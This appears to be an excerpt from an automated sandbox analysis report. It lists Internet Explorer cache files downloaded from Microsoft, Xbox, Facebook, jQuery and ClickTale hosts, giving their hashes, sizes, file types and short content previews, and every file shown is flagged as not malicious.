                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/microsoft-365/_scrf/js/themes=default/54-a2dfe7/6a-ea64e0/86-39caa6/78-332b0a/a3-77e78d/36-3bbfcb/34-a35c67/b4-ce5167/2b-b6ab60/7e-a075ed/9d-bc041d/c4-301a8f?ver=2.0&_cf=20210415
                                                                                                                                                                                                              Preview: define("Buybox",["dialog","componentFactory","officeUtilities"],function(n,t,i){"use strict";function o(n){var t=n.querySelector(r.dialogContentSelector);t&&(t.innerHTML="")}function s(n){var t=i.getSiblings(n),r;if(t&&t.length)for(r=0;r<t.length;r++)t[r].setAttribute("data-js-controlledby","dialog")}function h(n,t){var u,i,e;if(n.preventDefault(),s(t),f=n.currentTarget,u=n.currentTarget.parentElement,u&&t.mwfInstances&&t.mwfInstances.Dialog&&(i=u.nextElementSibling,i&&i.classList.contains("popup"))){var o=t.mwfInstances.Dialog,c=t.querySelector(r.dialogContentSelector),h=i.cloneNode(!0);h.classList.remove("x-hidden");e=document.createDocumentFragment();e.appendChild(h);c.appendChild(e);o.update();o.show()}}function c(){var h=getComputedStyle(document.body).backgroundColor==="rgb(0, 0, 0)",s;if(u=document.querySelectorAll(r.comparisonTableModuleSelector),e=document.querySelectorAll(r.dialogSelector),t.ComponentFactory.create([{c:n.Dialog,elements:e,callback:function(n){n&&n.length&&Arr
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\cartcount[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1283
                                                                                                                                                                                                              Entropy (8bit):4.393500974386876
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:KPgkrfXKLf7fcabNBGFMpYMNwy+Mz4zMGgZv4c0EgtiQ5FgWyb0gDIgdcZPx+Ydg:KPv6HUY5+yAZFAXJqiXZXTMK
                                                                                                                                                                                                              MD5:1BF3F6D72753254D68A4A8C99DB850AD
                                                                                                                                                                                                              SHA1:E98B92CFF496817E3D5E6CD117F06BEEFAAD3E5F
                                                                                                                                                                                                              SHA-256:68D929A10C3CD609B936B50A541533994B044B38558A33530FF45D1B420CC07E
                                                                                                                                                                                                              SHA-512:C2F17E5861E800E32F3AC3DEA7424384E82B2F27B79C14D24686C286D5A6559CABDABB6A58DF9125334E196CC7D3116B583B3AE1D9AE6711AB21F9F4B06AF2C0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ......<!DOCTYPE html>..<html>..<head>.. <title>title</title>..</head>..<body>.. <script>.. function getCartItemCountFromCookie() {.. var name = 'cartItemCount=';.. var allCookies = document.cookie.split(';');.. for (var i = 0; i < allCookies.length; i++) {.. var c = allCookies[i];.. while (c.charAt(0) === ' ') {.. c = c.substring(1);.. }.. if (c.indexOf(name) === 0) {.. return c.substring(name.length, c.length);.. }.. }.. return 0;.. }.... var count = getCartItemCountFromCookie();.... var parentHost = '';.. var parentOriginProtocol = '';.. var parentOrigin = '';.. try {.. parentHost = parent.location.hostname || '';.. parentOriginProtocol = parent.location.protocol;.. parentOrigin = parent.location.origin;.. } catch {..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\css[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):143792
                                                                                                                                                                                                              Entropy (8bit):5.380440401000318
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:jbQbQbpPBUtdVoW4j7mb8Kjg0Opwv62zj9NGZdje3mdz5Amwih6u3LjWG58OOg/v:jcc5pp2zjnv3mN5VFh6u3LjR5v
                                                                                                                                                                                                              MD5:210D976F6F8131C3E335E330A53F4E01
                                                                                                                                                                                                              SHA1:BBF60A5AF4F20312CE65CE79490BC06160CDE04F
                                                                                                                                                                                                              SHA-256:D5B65695391D9739165E331D56512DA07D4DE09AC29AB908D3FEC8437FDAF015
                                                                                                                                                                                                              SHA-512:6145FBD5E2B6BF8D6B7536DBD4FA8C97CA7FA2AD3AE29DEC87633BDD66B31616608955CBA48C47A84208498612F69AE4A7FEA11ECDD89F360FA918C0913A3DD0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.microsoft.com/SocContent/css
                                                                                                                                                                                                              Preview: @font-face{font-family:'OffSMDL2';src:url('/socfonts/OffSMDL2.4.00.woff') format('woff')}.HeaderUIFont{font-size:10pt;font-family:'Segoe UI Light','Segoe WP Light','wf_segoe-ui_light','wf_segoe-ui_normal','Segoe UI','Segoe WP',Helvetica,Tahoma,Arial,sans-serif;font-weight:300}.HeaderUIFont.macexcel,.HeaderUIFont.maconenote,.HeaderUIFont.macoutlook,.HeaderUIFont.macpowerpoint,.HeaderUIFont.macword{font-family:-apple-system,'Segoe UI Light','Segoe WP Light','wf_segoe-ui_light','wf_segoe-ui_normal','Segoe UI','Segoe WP',Helvetica,Tahoma,Arial,sans-serif}.HeaderUIFont.macexcel,.HeaderUIFont.maconenote,.HeaderUIFont.macoutlook,.HeaderUIFont.macpowerpoint,.HeaderUIFont.macword{font-family:-apple-system,'Segoe UI Light','Segoe WP Light','wf_segoe-ui_light','wf_segoe-ui_normal','Segoe UI','Segoe WP',Helvetica,Tahoma,Arial,sans-serif}.FooterUIFont{font-size:9pt;font-family:'wf_segoe-ui_semilight','wf_segoe-ui_light','Segoe UI Light','Segoe WP Light','wf_segoe-ui_normal','Segoe UI','Segoe WP',Ta
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\dc2d84b2-8afc-4f70-912e-48d89dc232eb[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):655
                                                                                                                                                                                                              Entropy (8bit):5.5385101196307085
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:TMHdPNMuNi/nzVJ/KYf3nSKpOwgHWajENcrXOsYr9+:2dauNATLf3SKTgjANcrOL9+
                                                                                                                                                                                                              MD5:EBD8E32A892D4FC97A1F9D0C3BB7453F
                                                                                                                                                                                                              SHA1:EF94E40FD1B438991B5E24D6F03078E1826E4E75
                                                                                                                                                                                                              SHA-256:C7D45A99DA7C26F208290268CB42A7CF0F74E283BA2D1D3CA36D76B637001380
                                                                                                                                                                                                              SHA-512:937D20EEB5E0611D1FA2D2BF3CD4DD805680A34A2B242F0A9E8E43484D81FD7CA8DF755174853BA3212AEF4A4542575E21B27C56767530A27CDCFDBFC6417F6F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/dc/2d/dc2d84b2-8afc-4f70-912e-48d89dc232eb.svg?n=Homepage-FY20_Home-Icons-0_XGP_72x56-01.svg
                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 24.3.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 72 56" style="enable-background:new 0 0 72 56;" xml:space="preserve">.<style type="text/css">...st0{fill:#FFFFFF;}...st1{fill:#107C10;}.</style>.<rect class="st0" width="72" height="56"/>.<path class="st1" d="M54.2,14.8v-3.3h-9.9V4.9h-33v46.2h33v-6.6h9.9v-3.3h6.6V14.8H54.2z M40.9,47.8H14.5V8.2h26.4V47.8z M50.8,41.2..h-6.6V14.8h6.6V41.2z M57.5,37.9h-3.3V18.1h3.3V37.9z"/>.</svg>.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\e3-082b89[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):113554
                                                                                                                                                                                                              Entropy (8bit):5.229314246077694
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:uzUHQcyAz7pxhX2OG+59gEkpCI+IX8BJWxFu209RhY8WOyd1EwgXA9GKamAMKSAF:uzUZpxJIS20y9d1EwgXA95KScDCE4+
                                                                                                                                                                                                              MD5:5DD38A2A614253796B6DB2FBBEC0C927
                                                                                                                                                                                                              SHA1:0CC9E0EBD9E137822C5490DE7533F61970F94898
                                                                                                                                                                                                              SHA-256:1DBD3D5F3FDDE6C9302AF134E68A76E15E684A16B64F402F1A72135FFA501B40
                                                                                                                                                                                                              SHA-512:790E192AC1B2A4A2AC3DF239649FC96523F6AAFC1277246DEB670433BFEE6EF76433305B731FE65C99796D670BEA11456114903218D4EFF46D7FA659006DA601
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/mscomhp/_scrf/js/themes=default/2f-63ce8f/45-f9a0d4/aa-dc1460/2d-7a9063/dc-7e9864/4f-5115f8/7d-266f10/4a-abd94b/6d-c07ea1/9d-b58f60/f6-aa5278/cd-23d3b0/6d-1e7ed0/b7-cadaa7/c4-898cf2/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/92-10345d/f8-73a5f2/79-499886/7e-cda2d3/69-13871c/b7-0ad59f/91-97a04f/1f-100dea/33-abe4df/17-f90ef1/e3-082b89?ver=2.0&_cf=20210415
                                                                                                                                                                                                              Preview: var __extends;define("ajaxWithAnimation",["jqReady!","jsll"],function(n,t){var i=["<div class='c-progress f-indeterminate-","regional","' style='margin:","0","px auto' tabindex='0' role='progressbar'><span><\/span><span><\/span><span><\/span><span><\/span><span><\/span><\/div>"],u=function(t,r){var u=n(t),o,f,e;u.length&&(o=(r.loaderType||"").toUpperCase(),i[1]=o==="PROGRESS"||o==="PROGRESSBAR"?"regional":o==="SPINNERLARGE"?"local f-progress-large f-center":"local f-progress-small",r.margin&&r.margin.length&&(i[3]=r.margin),f=i.join(""),e=(r.loaderPosition||"").toUpperCase(),e==="TOP"||e==="BOTTOM"?(u.addClass("ajaxloader"),e==="BOTTOM"?u.append(f):u.prepend(f)):(u.parent().addClass("ajaxloader"),e==="BEFORE"?u.before(f):u.after(f)))},f=function(t,i){var r=n(t),u;r.length&&(u=(i.loaderPosition||"").toUpperCase(),u!=="TOP"&&u!=="BOTTOM"&&(r=r.parent()),r.removeClass("ajaxloader").children().remove(".c-progress"))},r=function(i){i.refreshElement&&u(i.refreshElement,i);var r=n.extend(i,{s
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\e8353844-a8a1-4be1-8fca-18c6281bfb14[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:[TIFF image data, big-endian, direntries=16, height=3456, bps=0, compression=none, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS-1D X, orientation=upper-left, width=5184], baseline, precision 8, 358x201, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):54081
                                                                                                                                                                                                              Entropy (8bit):7.37951740253037
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:qWmyD2U7WmyDYTu7nN9LpFiiRg5Yy9er/HSRMJWcT6dbGvLMyUO:bTuFk5JeTSRuWcT6lGTMlO
                                                                                                                                                                                                              MD5:B75B9088BA1F35D4B8C4ACDE4EED0EAD
                                                                                                                                                                                                              SHA1:DD37D3AF77580393D662F90CF97CD14E371A0EED
                                                                                                                                                                                                              SHA-256:1AF44BBF40E73FBEACB4AA6F4A295A6E7F0FAC4BBAD77C4E97D811354F93A194
                                                                                                                                                                                                              SHA-512:2D475E0C95FAB87352AFD918F130AB0E94414B8F4F1E027972D2CF4935C81C0DC47793F9ADB584DCC6BE282A214BFF11EB08AA24478FD028553175393BBF3E75
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.content.office.net/en-us/media/e8353844-a8a1-4be1-8fca-18c6281bfb14.jpg
                                                                                                                                                                                                              Preview: .....`Exif..MM.*...............@.......................................................................................................................................(...........1.....".....2...........i.........0..........Canon.Canon EOS-1D X.......'.......'.Adobe Photoshop CC 2019 (Windows).2020:04:08 10:10:41...!......................."...........'...........0...........2..................0230..................................................................................................................43..........43..........43.........................f......................"...........*.............................................................1.........2.2.........@.4.........`.5.........x...........}...#....2019:06:12 12:51:53.2019:06:12 12:51:53..jJ...B@...........................F....................052011000029.............F....................EF24-70mm f/2.8L II USM.4655002051.........................................(.................................v.......H......
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\f5-7e27a5[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):385244
                                                                                                                                                                                                              Entropy (8bit):5.303166105972209
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:1fwtwmyU4srxCqFOp03Mw1+/cg3poEjOJ2MVuGiV:xawmxxn917qV
                                                                                                                                                                                                              MD5:445AE88CCF8D1C3CC3432242F5E29736
                                                                                                                                                                                                              SHA1:867367894BEE640221EA36FA03519EEC941C9BBC
                                                                                                                                                                                                              SHA-256:26F9C396E932E8A598AA104F366B1741646F020D1E906A465132DEB3A22CB262
                                                                                                                                                                                                              SHA-512:480DB2EF5AB295EC719B4454D7C490B897F03E7157097432F1746132869395B741DB6BA170DD9F88E840A6C519FC55875865CAA5B4A08985CAA2402905E4C200
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/MICROSOFT-365/_scrf/js/themes=default/9e-6ade99/b4-ce5167/2b-b6ab60/7e-a075ed/28-8f59e1/1e-b84759/58-f3fc85/c4-301a8f/19-9c8e36/a3-e4fa11/66-afd0b6/f5-7e27a5?ver=2.0&_cf=20210415
                                                                                                                                                                                                              Preview: define("notificationBanner",["jqReady!"],function(n){"use strict";function i(){var o=document.querySelector(t.id),f,i,s,e;if(o)for(f=o.querySelectorAll(t.clsMessage),u(),i=0;i<f.length;i++)if(s=f[i].getAttribute("data-sel"),e=document.querySelector(s),e){var h=f[i].getAttribute("data-pos"),c=n(f[i]).clone(),l=c[0];r(e,h,l)}}function r(i,r,u){try{switch(r){case"replace":n(i).html(u);break;case"replaceText":n(i).text(n(u).text().trim());break;case"prepend":n(i).prepend(u);break;case"append":n(i).append(u);break;case"before":i.parentNode.insertBefore(u,i);break;case"after":default:i.parentNode.insertBefore(u,i.nextSibling)}i.classList.add(t.clsPosElement.substring(1));u.removeAttribute("data-pos");u.removeAttribute("data-sel");u.classList.add(t.clsActiveMessage.substring(1))}catch(f){}}function u(){for(var i=document.querySelectorAll(t.clsActiveMessage),n=0;n<i.length;n++)i[n].remove()}function f(){i();document.addEventListener("moduleRefreshed",i)}var t={id:"#ownb-wrapper",clsMessage:".o
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\facebook[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):265
                                                                                                                                                                                                              Entropy (8bit):6.681697500155679
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:6v/lhP1RnDsp9ULc5k6sc+7IhXxXA1MiyphxiDw66yVUjqIbp:6v/79GCc5kAhqMpph8UyWq6
                                                                                                                                                                                                              MD5:352637E02A377A29073AA9F65B1FBA22
                                                                                                                                                                                                              SHA1:E5E2B07F777F47DCF158120B11D0B6BDEB0BC878
                                                                                                                                                                                                              SHA-256:C77873C0C4A8499BA493832E950D41CBAEE43020D5C99D702A1E9DEBBAF0DB32
                                                                                                                                                                                                              SHA-512:DFDF4B94AC252B67E6D255C708505845AD427CEC4155D4C2796B84AC49658D6D140CC3744A5BA7A2F4F7AE989EC89D1F13271AAAC44ADF15D8553F45BBF4470A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/85288795/coreui.statics/images/social/facebook.png
                                                                                                                                                                                                              Preview: .PNG........IHDR... ... ............tEXtSoftware.Adobe ImageReadyq.e<....IDATx.bt.].@K..@c0j.A.B....Vey......T...X:>PKYN.Y.9n5u,...m..a.dG..6..C...].O.=..V....D.>8.)0z1.)D....@....H...(..........0.^..J.8x.......W......-.G-..`0V.....8........@2..M....IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\fbevents[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):93774
                                                                                                                                                                                                              Entropy (8bit):5.392602416896564
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:sM+OWt6w6aic9MeipKKqQqcThe7Kdv0a9sIOC1jaMu5Qm2B+QNSMngUSZYSlIUiX:sOQMj1SVBYDGKx
                                                                                                                                                                                                              MD5:077B8B6E85C9EDF74D372D155180E6D3
                                                                                                                                                                                                              SHA1:4A24BE343819AD355807ADB01579366A1E64B8B9
                                                                                                                                                                                                              SHA-256:A517525B8A7D39BCAF1CF5F9695C5BE8FCE7A6B920A3924C1A4F70E8EA748C05
                                                                                                                                                                                                              SHA-512:DB714A2EAF14E6727086795FE151F3729DA32BFA0B87AB74289B7DF9E0808E1FEBCA38D2622EF47B7AA263479BDB66857011E2302DD1AFC9E814EF6B74642DF9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://connect.facebook.net/en_US/fbevents.js
                                                                                                                                                                                                              Preview: /**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\jquery.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):89476
                                                                                                                                                                                                              Entropy (8bit):5.2896589255084425
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                                                                                                                                                                              MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                                                                                                                                                              SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                                                                                                                                                              SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                                                                                                                                                              SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js
                                                                                                                                                                                                              Preview: /*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\jsll-4.3.5[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):56291
                                                                                                                                                                                                              Entropy (8bit):5.402726813102013
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:0tgoOjNcc6rCDBjPSeAaKU7rD8kc7HhAHZcllEiKjkT3dgD4GD1hrTd8PuWCF9IS:0tV81ICDVRQnhAiUinxgDRQ7wYv6p
                                                                                                                                                                                                              MD5:CAF5C715307CB80BD4B30E2DA8E95C37
                                                                                                                                                                                                              SHA1:961579FB71954E027DD519058F6E2DA3D83EB7C2
                                                                                                                                                                                                              SHA-256:E246EFF2F6AE3E255A06EB561E6FC93AE3BEF2CCE22C5E0124D713C15F80567C
                                                                                                                                                                                                              SHA-512:DAB733460AFF828BBC696B159D8B0B3877E648FD4E3E59A913865C676032816B4599D5390326C7EFE652C5636C5B4F56B9D78413EB19AD19E5616D049BC775B0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://az725175.vo.msecnd.net/scripts/jsll-4.3.5.js
                                                                                                                                                                                                              Preview: var awa=awa||{},behaviorKey;awa.isInitialized=!1;awa.verbosityLevels={NONE:0,ERROR:1,WARNING:2,INFORMATION:3};awa.behavior={UNDEFINED:0,NAVIGATIONBACK:1,NAVIGATION:2,NAVIGATIONFORWARD:3,APPLY:4,REMOVE:5,SORT:6,EXPAND:7,REDUCE:8,CONTEXTMENU:9,TAB:10,COPY:11,EXPERIMENTATION:12,PRINT:13,SHOW:14,HIDE:15,MAXIMIZE:16,MINIMIZE:17,BACKBUTTON:18,STARTPROCESS:20,PROCESSCHECKPOINT:21,COMPLETEPROCESS:22,SCENARIOCANCEL:23,DOWNLOADCOMMIT:40,DOWNLOAD:41,SEARCHAUTOCOMPLETE:60,SEARCH:61,SEARCHINITIATE:62,TEXTBOXINPUT:63,PURCHASE:80,ADDTOCART:81,VIEWCART:82,ADDWISHLIST:83,FINDSTORE:84,CHECKOUT:85,REMOVEFROMCART:86,PURCHASECOMPLETE:87,VIEWCHECKOUTPAGE:88,VIEWCARTPAGE:89,VIEWPDP:90,UPDATEITEMQUANTITY:91,INTENTTOBUY:92,PUSHTOINSTALL:93,SIGNIN:100,SIGNOUT:101,SOCIALSHARE:120,SOCIALLIKE:121,SOCIALREPLY:122,CALL:123,EMAIL:124,COMMUNITY:125,SOCIALFOLLOW:126,VOTE:140,SURVEYINITIATE:141,SURVEYCOMPLETE:142,REPORTAPPLICATION:143,REPORTREVIEW:144,SURVEYCHECKPOINT:145,CONTACT:160,REGISTRATIONINITIATE:161,REGISTRATIO
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\latest-WR110[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):56283
                                                                                                                                                                                                              Entropy (8bit):5.575898234761317
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:8MXDbNdrT/YryUzkElLxY8ZRAsSl6KYpgGRfecJapan4Y2IRoZs9aUmI4O:8gAgCLxY8Xbn8FZud
                                                                                                                                                                                                              MD5:029D74D554F1602E2FBE6FBC1DF433B6
                                                                                                                                                                                                              SHA1:365F1932AD5D9FFB5D3012B988AE226CA1489A16
                                                                                                                                                                                                              SHA-256:A3273C0CF5AB9ECBE74D65761CAF773674EF7AFFF8B4B1D3C8B8C84EF9E67039
                                                                                                                                                                                                              SHA-512:1FAC550CDE8EB6B3246BA71974D7AE813398D180EC1D2F6499DDBD72C860B60A38C50FDE231951D9AAFC992110551E37BB3035EA6B78196C73407A43397CEF8E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://cdnssl.clicktale.net/www/latest-WR110.js
                                                                                                                                                                                                              Preview: /*! Copyright 2006-2020 ClickTale Ltd. */.if(!(ClickTaleGlobal.api&&ClickTaleGlobal.api.ClickTaleOnReadyInvoked)){!function(){!function(){var cy=!0,cv=null,cu=!1;function ct(ca){return function(){return ca}}var cr;var cp;function co(){if(cp){return cp}var ca=window.ClickTaleGlobal;ca||(ca={},window.ClickTaleGlobal=ca);ca.exports=ca.exports||{};ca.symbols=ca.symbols||{};ca.api=ca.api||{};return cp=ca}var cn;co().symbols.WREC=dg;function cm(ca){if(!cn){ca=ca.ClickTaleSettings;if("object"!==typeof ca){return cv}cn||(cn=ca)}return cn}function dg(){cn=cv}function cl(cb,ca,da){return"function"===typeof cb?cb:typeof cb===ca?function(){return cb}:da||cv}function cQ(cb){var cb=(cm(cb)||{}).Persistence||{},ca=cb.EnableStorage,dz=cb.EnableStreams,dy=cb.EnableDispatch,db=cb.AutoDispatch,da=cb.Providers;cb.EnableStorage=function(){var dA="function"===typeof ca?!!ca():ca;return"boolean"===typeof dA?dA:cy};cb.EnableStreams=function(){var dA="function"===typeof dz?!!dz():dz;return"boolean"===typeof dA
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\latest[1].eot
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:Embedded OpenType (EOT), Segoe UI Semibold family
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):30643
                                                                                                                                                                                                              Entropy (8bit):7.976822258863597
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:UOtV1asJ9G0dAdnVrKX/HkVJRPvkgxYZ4Zoe:bLasJ9G0u0fk/RnkgxGof
                                                                                                                                                                                                              MD5:E812BA8B7E2A657F2B70CFACE93C7682
                                                                                                                                                                                                              SHA1:2F02CDDBB483F9B11BBBE74C3CA917A4C345FBAD
                                                                                                                                                                                                              SHA-256:3330C1DEAC468874238DD0C6BF902179A8731EDA8A208C7D01DAC0AB1EAE1BC9
                                                                                                                                                                                                              SHA-512:354B2DB12BC1D67F26F94352B0B663DAD64C46C107454FC19CFEA01C54BB09340BC26C06DE1B96FF826F5287CE246A6317722BAE41B72B63BA86FDAF844BA94E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://i.s-microsoft.com/fonts/segoe-ui/west-european/semibold/latest.eot?
